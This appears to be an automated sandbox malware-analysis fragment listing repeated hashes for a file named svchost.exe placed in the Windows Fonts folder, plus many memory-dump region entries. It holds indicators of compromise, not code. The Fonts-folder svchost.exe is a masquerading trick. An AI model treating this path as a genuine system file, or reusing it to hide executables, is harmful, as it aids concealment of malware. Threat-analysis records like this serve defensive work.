SHA25650ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd
SHA512cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c
-
\Windows\Fonts\svchost.exeFilesize
87KB
MD5f3562c44fc322b78460772ec663b5d78
SHA1cf5816f1a80a61b5a890232235441b424ab8ffff
SHA25650ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd
SHA512cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c
-
\Windows\Fonts\svchost.exeFilesize
87KB
MD5f3562c44fc322b78460772ec663b5d78
SHA1cf5816f1a80a61b5a890232235441b424ab8ffff
SHA25650ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd
SHA512cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c
-
\Windows\Fonts\svchost.exeFilesize
87KB
MD5f3562c44fc322b78460772ec663b5d78
SHA1cf5816f1a80a61b5a890232235441b424ab8ffff
SHA25650ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd
SHA512cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c
-
memory/276-93-0x0000000000000000-mapping.dmp
-
memory/316-63-0x0000000000000000-mapping.dmp
-
memory/360-72-0x0000000000000000-mapping.dmp
-
memory/368-68-0x0000000000000000-mapping.dmp
-
memory/520-90-0x0000000000000000-mapping.dmp
-
memory/520-65-0x0000000000000000-mapping.dmp
-
memory/568-64-0x0000000000000000-mapping.dmp
-
memory/580-66-0x0000000000000000-mapping.dmp
-
memory/604-127-0x0000000000000000-mapping.dmp
-
memory/664-134-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/664-116-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/664-105-0x0000000000000000-mapping.dmp
-
memory/688-126-0x0000000000000000-mapping.dmp
-
memory/688-56-0x0000000000000000-mapping.dmp
-
memory/772-95-0x0000000000000000-mapping.dmp
-
memory/812-87-0x0000000000000000-mapping.dmp
-
memory/836-91-0x0000000000000000-mapping.dmp
-
memory/848-84-0x0000000000000000-mapping.dmp
-
memory/880-175-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/880-132-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/880-98-0x0000000000000000-mapping.dmp
-
memory/904-78-0x0000000000000000-mapping.dmp
-
memory/956-82-0x0000000000000000-mapping.dmp
-
memory/956-58-0x0000000000000000-mapping.dmp
-
memory/980-99-0x0000000000000000-mapping.dmp
-
memory/1036-133-0x0000000000000000-mapping.dmp
-
memory/1036-100-0x0000000000000000-mapping.dmp
-
memory/1160-129-0x0000000000000000-mapping.dmp
-
memory/1164-113-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/1164-139-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/1164-102-0x0000000000000000-mapping.dmp
-
memory/1236-61-0x0000000000000000-mapping.dmp
-
memory/1260-128-0x0000000000000000-mapping.dmp
-
memory/1264-60-0x0000000000000000-mapping.dmp
-
memory/1264-88-0x0000000000000000-mapping.dmp
-
memory/1296-89-0x0000000000000000-mapping.dmp
-
memory/1300-80-0x0000000000000000-mapping.dmp
-
memory/1324-59-0x0000000000000000-mapping.dmp
-
memory/1332-122-0x0000000000000000-mapping.dmp
-
memory/1336-97-0x0000000000000000-mapping.dmp
-
memory/1412-83-0x0000000000000000-mapping.dmp
-
memory/1416-96-0x0000000000000000-mapping.dmp
-
memory/1480-125-0x0000000000000000-mapping.dmp
-
memory/1492-114-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/1492-104-0x0000000000000000-mapping.dmp
-
memory/1492-135-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/1500-86-0x0000000000000000-mapping.dmp
-
memory/1580-74-0x0000000000000000-mapping.dmp
-
memory/1588-111-0x0000000000000000-mapping.dmp
-
memory/1628-73-0x0000000000000000-mapping.dmp
-
memory/1704-67-0x0000000000000000-mapping.dmp
-
memory/1716-131-0x0000000000000000-mapping.dmp
-
memory/1724-77-0x0000000000000000-mapping.dmp
-
memory/1728-57-0x0000000000000000-mapping.dmp
-
memory/1760-121-0x0000000000000000-mapping.dmp
-
memory/1764-70-0x0000000000000000-mapping.dmp
-
memory/1792-69-0x0000000000000000-mapping.dmp
-
memory/1808-76-0x0000000000000000-mapping.dmp
-
memory/1844-79-0x0000000000000000-mapping.dmp
-
memory/1868-107-0x0000000000000000-mapping.dmp
-
memory/1868-115-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/1868-171-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/1892-55-0x0000000000400000-0x0000000000656000-memory.dmpFilesize
2.3MB
-
memory/1892-54-0x0000000075AE1000-0x0000000075AE3000-memory.dmpFilesize
8KB
-
memory/1892-112-0x0000000002160000-0x00000000021B3000-memory.dmpFilesize
332KB
-
memory/1936-108-0x0000000000000000-mapping.dmp
-
memory/1952-85-0x0000000000000000-mapping.dmp
-
memory/1956-71-0x0000000000000000-mapping.dmp
-
memory/1976-75-0x0000000000000000-mapping.dmp
-
memory/1992-119-0x0000000000000000-mapping.dmp
-
memory/1996-92-0x0000000000000000-mapping.dmp
-
memory/2004-120-0x0000000000000000-mapping.dmp
-
memory/2008-94-0x0000000000000000-mapping.dmp
-
memory/2028-124-0x0000000000000000-mapping.dmp
-
memory/2028-62-0x0000000000000000-mapping.dmp
-
memory/2036-81-0x0000000000000000-mapping.dmp
-
memory/2044-123-0x0000000000000000-mapping.dmp
-
memory/2052-166-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2540-165-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2540-153-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2548-149-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2556-154-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2556-156-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2564-152-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2564-174-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2776-173-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2776-176-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/3048-170-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/3056-168-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/3064-172-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB